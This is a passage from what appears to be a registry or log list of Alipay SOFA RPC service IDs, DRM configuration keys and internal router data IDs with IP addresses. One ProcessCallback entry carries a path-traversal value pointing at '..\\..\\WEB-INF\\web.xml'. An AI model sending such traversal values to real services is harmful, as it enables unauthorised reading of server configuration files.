de.api.materials.MaterialsQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMKTEYE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.manage.manageOrder.BudgetOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membercenter.service.facade.PasswordManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:mobileanti@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.ApiResultHandlerResource.promoUnRetriableErrorCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finassistantmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmodelpredict.core.service.model.message.MessageRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@gftms#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotetradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finprodcenter.common.service.facade.AccGoldProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdld.common.service.facade.distribute.task.DistributeTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.opencore.common.security.drm.NotifyParamSwitchDrm.containSignTypeSPIGraySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobot.service.facade.mng.api.MatchTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.policyCountStatisticsGrayProportion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.online.TaskRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.164.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcomment.common.service.facade.api.comment.CommentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.222.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.filecore.service.facade.api.FileMoveService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxcalc.service.IndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MemberConfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finbatchTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mm_fixedDepositOpenDemandAccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.sdlib.namelist.BloomFilterQueryTRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.UserInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgRuleMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.operation.OperAutoMsgTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.ShopManageForServiceSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.change.api.OpscloudQueryService:1.0:hnbc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.121.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.iuserdmp.common.service.facade.api.IuserLabelDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.settlequery.common.service.facade.config.api.MachineMonitorQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.messagefusion.inner.facade.api.FanoutInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.load.AppInfoLoadServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.RiskAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.PaymentmngDeployGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.ServiceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.ds.common.service.facade.DataSetQueryServiceFacade:1.0:local@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frboss.facade.api.DingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FLUXPRO_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opssla.common.service.facade.ResourceMetaDataFacade:1.0:iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterHgDecisionTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.h5security.api.UserActionForbidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.shared.gildata.service.GdShareStruService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finriskeventseek.facade.ChangeEventMetaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.nodejs.ConsumerService:1.0:industryprod-cloudpaybill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdetail.facade.MerchantMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.service.facade.FinFundTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.biz.daemon.msg.handler.InstServiceAbilityIdentifyHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.operationReviewerWithoutProductStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finhadecision.common.service.facade.api.IndexServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.newyear.TopicDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.kaproject.KaprojectSettlementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.ChatTagMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.point.MemberPointService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:aeicoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.dwdssp.service.UploadSFSFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbdataversion.common.service.facade.OfflineServiceStatusQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.jobworth.UserJobWorthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.external.ExternalSystemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.RouteSetManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.234.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-autoaftermarket-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.drm.InsServiceWindowDrmClient.serviceWindowConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airbops.service.common.proxy.timeout.facade.ProxyTimeoutFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.p2p.CouponPlayShareQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iusergrowthus.facade.api.StudentPageRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.TransferDevelopNewFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.holoxlib.common.shared.facade.spi.InternalRemoteHoloxCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@meshysale#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.ap.bizprod.common.service.facade.api.friendship.RoleFriendshipManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.FundProductStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icif.service.facade.api.ValidateMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.simple.DeliverFacade:1.0:finfocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.apiv2.AuthorityMngQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.report.PublicRiskmngComplainContentConsultCallBack:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.member.paidmember.facade.ImageVerifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antscheduler.facade.IHealthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custview.facade.TaobaoMemberViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.DefenseRuleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.order.SyncOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.232.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthmarket.common.service.facade.service.ProductInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.133.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\\..\\..\\WEB-INF\\web.xml@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOFAMVC-CLOUD-TEST#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitypublishcore.common.service.facade.api.BusinessActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstrategy.common.service.facadeseven.fixedinvestment.FinstrategyDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.mobilehelp.BkcsProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.inner.service.process.AliyunProcessInstanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstm.common.service.facade.mart.facade.ImgContentFacade:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcore.common.service.facade.kbjob.KbJobQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.144.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.kborderprod.KopOrderConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktranscore.common.service.facade.transtrade.CommonTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.OrganizationService:1.0:organizationService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundDebtCollectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.OverseaRemitService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.charge_golden_ob_datasource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dingjiu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.decisionx.facade.api.DxProjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.decision.facade.FdDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.mobileSecurityCheckSceneCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.ProtocolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iclientgw.adapterservice.MobileAdapterService:1.0:imobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.recruit2.CmpEnrollManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataconsole.config.zcache.ZcacheStoreNameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.core.flow.common.service.PromobenchEngineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_O_DWDIS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.zcache.tbase.wishTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.activity.facade.gzone.activity.platform.CicadaActivityOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.circle.api.CircleServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.group.rpc.MerchantGroupRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.userIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iremitprod.common.service.facade.api.RemitUserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.topicpush.TopicPushTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.event.EventHandler:1.0:ifxpositionAdviceTradeAcceptHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.65.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeval.core.service.emulator.dal.playback.appiterationtaskcasereplaylinedata.OeEmulatorPlaybackAppIterationTaskCaseReplayLineDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.mission.PcreditMarketMissionConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.DocumentContributionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.RouteExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.location.ResLocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.RearDetectFeatureActuator:1.0:rearContentCheckDetectActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.camp.CampLotteryExtFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.app.certifymng.enableTenantCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.common.service.facade.backend.api.item.ItemRelationQueryBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ibops.common.service.facade.query.UserTradeInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttune.common.service.facade.frontend.ComposeTuneService:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","CoreApiSpecRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.smartDeductFailedTimeCeilingStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.facade.GlobalCGCPQrCodeSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.234.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promocenter_activityAuditCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.HBActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocommopt.com.service.facade.api.SelfMarketingPromoCampTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.assettool.spi.AssetToolDebitService:1.0:gloanpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.jobworth.UserJobWorthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.yooki.moon.facade.PepoleFacade:1.0:pepoleFacade2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.income.common.service.facade.BillQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.security.auth.port.adapter.rpc.core.InnerPermissionService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_ACCOUNTINGTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstoreapp.common.service.facade.store.manage.TemplateMiniAppBasedStoreOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:workflow_feedback_userFeedbackReplyGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.category.RelMccQualicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardSettleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-PCINSTPROD-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_INSTPAY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.escrowexprod.common.service.facade.EscrowRefundServiceFacade:1.0:uniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promoplatform_DeliverTaskDeliverProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.biz.service.facade.test.AsyncSignNotifyEventTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.infosecmngDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_PAGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssUnEscapeEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.95.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobileaix@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.177.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelpredict.biz.service.impl.feature.ExecutorRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialportal.web.ps.rpc.facade.UserInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.CccRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.openhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcore.common.service.facade.spi.config.KbProxyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.airbops.mobileDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinsight.service.api.rpt.ReportViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.rule.RuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.direct.core.BizEventDirectCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FABRIC#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.developerops.facade.search.OpenhomeSearchManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.IppProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OfferMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.insttrade.addp_tddl_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.ClearingLogRegisterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.con